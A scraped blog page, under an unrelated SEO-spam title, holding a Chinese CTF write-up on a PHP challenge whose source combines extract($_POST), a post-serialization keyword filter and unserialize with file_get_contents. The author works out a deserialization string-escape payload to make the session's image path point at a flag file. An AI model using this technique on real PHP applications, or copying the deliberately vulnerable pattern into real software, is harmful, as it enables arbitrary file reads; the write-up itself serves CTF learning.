当前位置：首页 > wzjs >正文

石林县工程建设个体交易网站南宁百度seo

wzjs 2025/8/15 4:33:47

石林县工程建设个体交易网站,南宁百度seo,建站公司的工作流程,留下自己的wordpress题目源代码 <?php$function $_GET[f];function filter($img){$filter_arr array(php,flag,php5,php4,fl1g); //implode 函数将数组 $filter_arr 中的元素用 | 连接成一个字符串。 // |在正则表达式中表示或的关系，所以连接后的字符串类似于 php|flag|php5|ph…

题目源代码

<?php$function = @$_GET['f'];function filter($img){$filter_arr = array('php','flag','php5','php4','fl1g');
//implode 函数将数组 $filter_arr 中的元素用 | 连接成一个字符串。
// |在正则表达式中表示或的关系，所以连接后的字符串类似于 php|flag|php5|php4|fl1g。
// 前后的 / 表示正则表达式的定界符，末尾的i表示不区分大小写匹配
//最终的效果就是正则表达式匹配字符串中出现的任意一个过滤词$filter = '/'.implode('|',$filter_arr).'/i';return preg_replace($filter,'',$img);
}if($_SESSION){
//unset()销毁整个会话数组unset($_SESSION);
}
//将user会话设置为guest表示当前用户为访客
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;//将 $_POST 数组中的元素提取出来，使其成为单独的变量。
//如果 $_POST 中有一个键为 function 的元素，那么会创建一个名为 $function 的变量
//其值为该元素的值。
extract($_POST);if(!$function){echo '<a href="index.php?f=highlight_file">source_code</a>';
}if(!$_GET['img_path']){$_SESSION['img'] = base64_encode('guest_img.png');
}else{$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}$serialize_info = filter(serialize($_SESSION));if($function == 'highlight_file'){highlight_file('index.php');
}else if($function == 'phpinfo'){eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){$userinfo = unserialize($serialize_info);echo file_get_contents(base64_decode($userinfo['img']));
}

源代码中提示我们在phpinfo里面有好东西，去看看

这个意思也就是说会在php解析完了以后包含d0g3_f1ag.php，大概率flag在这里

先从头捋一下：

在$GET['img_path']不存在的时候---$_SESSION['img']=base64-en("guest_img.png")

正常的逻辑就是，你这里$_SESSION['img']的值是guest_img.png定死了的，不会读取到flag文件

那怎么办呢，有两条路，第一条路是前面POST提交一个img是flag的值【这里提交变量为_SESSION这样进去就变成了$_SESSION就能混进本来的超级全局变量里头去了，好好好这么玩是吧】，第二条路就是利用php的反序列化字符串逃逸减少的情况，将原本的$_SESSION['img']=base64-en("guest_img.png")吞掉（变成前一个键的值），然后后面顺理成章接着我们构造的新的$_SESSION['img']的值

很明显第一条路中后面 $_SESSION['img'] = base64_encode('guest_img.png');还会再赋值一次，这样就覆盖了之前提交的img值，不行，所以利用字符串逃逸减少

先写个序列化php，但是像原来那么写死活编译不出来，应该就是变量名不能是_SESSION的事

这样不对！！

<?php
class _SESSION
{$public img='Z3Vlc3RfaW1nLnBuZw==';//guest_image.png$public user='guest';$public function='show_image';
}
$a=new _SESSION();
echo serialize($a);
?>

学习到个新的写法，就是直接写$_SESSION['xxx']

<?php
$_SESSION["user"] = 'kkk';
$_SESSION['function'] = 'show_image';
$_SESSION['img'] = base64_encode('guest_img.png');
echo serialize($_SESSION);//a:3:{s:4:"user";s:3:"kkk";s:8:"function";s:10:"show_image";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
?>

（后来发现这里头function的值可以随便取。。。）

就先试试user的值为n*php，function的值为;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==